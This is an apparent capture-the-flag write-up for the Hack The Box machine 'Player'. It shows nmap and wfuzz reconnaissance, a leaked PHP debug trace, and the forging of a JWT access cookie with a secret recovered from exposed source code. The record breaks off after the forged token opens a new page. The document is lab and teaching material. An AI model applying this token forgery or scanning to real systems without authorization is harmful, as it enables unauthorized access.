by 
Hack The Box Player (10.10.10.145) is a very hard linux machine.
As always, I added machine IP 10.10.10.145 to etc/hosts as player.htb and I began the namap scanning.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
➜ player nmap -sTV -p 1-65535 -oN nmap-player player.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-13 21:43 +03 Nmap scan report for 10.10.10.145 Host is up (0.014s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 6686/tcp open tcpwrapped Service Info: Host: player.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 173.42 seconds |
Nmap scan found 3 open ports. 22 (ssh), 80 (webserver) and 6686 (unknown tcp port)
I open the player.htb from browser to see what’s running in the port 80. There is a website but with a “forbidden” message.
So the next thing came in to my mind possible subdomains or virtual hosts of the player.htb domain using wfuzz
|
1 |
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomainstop1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.player.htb" -u http://player.htb -t 100 |
The wfuzz returned me 3 subdomains names
|
1 2 3 4 5 6 7 8 9 10 11 |
******************************************************** * Wfuzz 2.4 - The Web Fuzzer * ******************************************************** Target: http://player.htb/ Total requests: 19983 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000019: 200 86 L 229 W 5243 Ch "dev" 000000067: 200 63 L 180 W 1470 Ch "staging" 000000070: 200 259 L 714 W 9513 Ch "chat" |
After done with wfuzz, I the discoered vhosts to etc/hosts along with player.htb as below:
|
1 |
10.10.10.145 player.htb dev.player.htb staging.player.htb chat.player.htb |
After browsing through the discovered vHosts, I found the below websites running on them:
Lets enumerate one by one, starting with dev.player.htb
http://dev.player.htb/
The dev.player
http://staging.player.htb/
The staging.player.htb has a webpage showing warning about ongoing developments, there is a contact core team page, any input there gives an 501 inernal server error. However, before displaying error page, there is some untidy code diplayed, I cpatyured it here:
|
1 2 |
array(3) { [0]=> array(4) { ["file"]=> string(28) "/var/www/staging/contact.php" ["line"]=> int(6) ["function"]=> string(1) "c" ["args"]=> array(1) { [0]=> &string(9) "Cleveland" } } [1]=> array(4) { ["file"]=> string(28) "/var/www/staging/contact.php" ["line"]=> int(3) ["function"]=> string(1) "b" ["args"]=> array(1) { [0]=> &string(5) "Glenn" } } [2]=> array(4) { ["file"]=> string(28) "/var/www/staging/contact.php" ["line"]=> int(11) ["function"]=> string(1) "a" ["args"]=> array(1) { [0]=> &string(5) "Peter" } } } Database connection failed. Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php |
To find what’s going behind the screen I used burp to capture that moment. The burp showed me the reference of the page is http://staging.player.htb/contact.php.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
⚡ root@ns09 ~/htb/player curl http://staging.player.htb/contact.php array(3) { [0]=> array(4) { ["file"]=> string(28) "/var/www/staging/contact.php" ["line"]=> int(6) ["function"]=> string(1) "c" ["args"]=> array(1) { [0]=> &string(9) "Cleveland" } } [1]=> array(4) { ["file"]=> string(28) "/var/www/staging/contact.php" ["line"]=> int(3) ["function"]=> string(1) "b" ["args"]=> array(1) { [0]=> &string(5) "Glenn" } } [2]=> array(4) { ["file"]=> string(28) "/var/www/staging/contact.php" ["line"]=> int(11) ["function"]=> string(1) "a" ["args"]=> array(1) { [0]=> &string(5) "Peter" } } } Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php# ⚡ root@ns09 ~/htb/player |
I note down following for my future use:
|
1 2 |
Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php |
http://chat.player.htb/
This page seems to be an internal chat page between the devs. An automated blank reply by a user Vincent is sent back whatever I type in. I tried to intercept using
After reading messages in the chat, the following message caught my attention: They mentioned our staging exposing some sensitive files and main domain exposing source code which allowing them to access our product before release. Currently our team working on the fix.
http://player.htb/launcher/
The Burp interception, I saw that this page, every 10 seconds a GET request is sent to: /launcher/dee8dc8a47256c64630d803a4c40786e.php and receives the response: Not released yet
The curl request of the above PHP is as below:
I’ve as well noticed the responce is changed if I add email and click on send.
|
1 |
/launcher/dee8dc8a47256c64630d803a4c40786c.php |
And the response is as below:
|
1 |
Set-Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ.cjGwng6JiMiOWZGz7saOdOuhyr1vad5hAxOJCiM3uzU |
Looking at the above PHP code I understood that the PHP code uses JSON Web Tokens (JWT) to generate a token for login privileges.
So I went online to analyze the tokens using https://jwt.io/
So I have the decoded key using the JWD decoder online: C0B137FE2D792459F26FF763CCE44574A5B5AB03
However, If I noticed that the “blue part” in the encoded signature is based on the “Verify Signature”. If I add the secret I found in the PHP code it changes, but if I enable the “secret base64 encoded” option we get the exact signature from the original token!
So now I got the new TOKEN:
|
1 2 3 |
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3 NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKq w__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE |
Using the new token I got, I used BURP to send a GET request. The responce revealed a new page:
